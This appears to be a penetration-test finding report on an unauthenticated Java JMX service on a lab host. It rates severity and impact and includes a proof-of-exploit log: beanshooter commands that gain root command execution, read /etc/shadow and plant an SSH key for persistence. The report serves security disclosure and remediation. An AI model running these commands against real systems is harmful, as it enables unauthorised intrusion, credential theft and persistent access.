Finding H3-2024-0047
Severity: Critical | Status: Open | CWE-502

Insecure Java JMX Configuration

Java RMI Service on 10.0.4.4 (srv01.pod04.h3arange.internal) — Port 1099/TCP

9.8 Critical

CVSS v3.1 Score

Attack Vector: Network / Complexity: Low

Attack Paths

197

Affected Hosts

14

Critical Business Impact

This vulnerability was leveraged in 197 attack paths leading to critical impacts including domain compromise, database exfiltration of 847K PII records, and lateral movement across 14 hosts. The estimated data breach cost based on IBM's 2025 Cost of a Data Breach report is $4.88M for this volume of records.

Tags: Remote Code Execution, Deserialization, Privilege Escalation, Lateral Movement
Description

The Java Management Extensions (JMX) service on port 1099 of srv01.pod04.h3arange.internal is configured to allow unauthenticated remote connections. An attacker with network access can connect to the JMX service and execute arbitrary Java code through deserialization attacks, leading to full remote code execution on the target host. During the pentest, CyberScanner successfully exploited this misconfiguration to gain a root shell on the target system. The JMX service was found to be running with elevated privileges (root), significantly increasing the blast radius of this vulnerability. This weakness was a critical pivot point in the attack path, enabling lateral movement to the domain controller and eventual domain compromise.

Proof of Exploit

[scan] JMX Port Scan (08:05:12)
$ nmap -sV -p 1099 10.0.4.4
PORT     STATE SERVICE  VERSION
1099/tcp open  java-rmi Java RMI Registry
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|_    @10.0.4.4:43217
[exploit] Unauthenticated Connection (08:06:33)
$ java -jar beanshooter.jar enum 10.0.4.4 1099
[+] Connected to JMX service at 10.0.4.4:1099
[+] Authentication: DISABLED
[+] SSL: DISABLED
[+] Registered MBeans: 27
[+] Available operations: invoke, getAttribute, setAttribute
[+] Target OS: Linux 5.15.0-91-generic (root)
[exploit] Remote Code Execution (08:07:15)
$ beanshooter exec 10.0.4.4 1099 --cmd "id && hostname"
[+] Executing command via MLet MBean...
uid=0(root) gid=0(root) groups=0(root)
srv01.pod04.h3arange.internal

$ beanshooter exec 10.0.4.4 1099 --cmd "cat /etc/shadow | head -3"
root:$6$rZ8K2qL...:19726:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
[post-exploit] Persistence Established (08:08:44)
$ beanshooter exec 10.0.4.4 1099 --cmd "echo 'ssh-ed25519 AAAA...test@cyberscanner' >> /root/.ssh/authorized_keys"
[+] Command executed successfully

$ ssh root@10.0.4.4 -i /tmp/cs_key
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-91-generic x86_64)
root@srv01:~#
Related Attack Techniques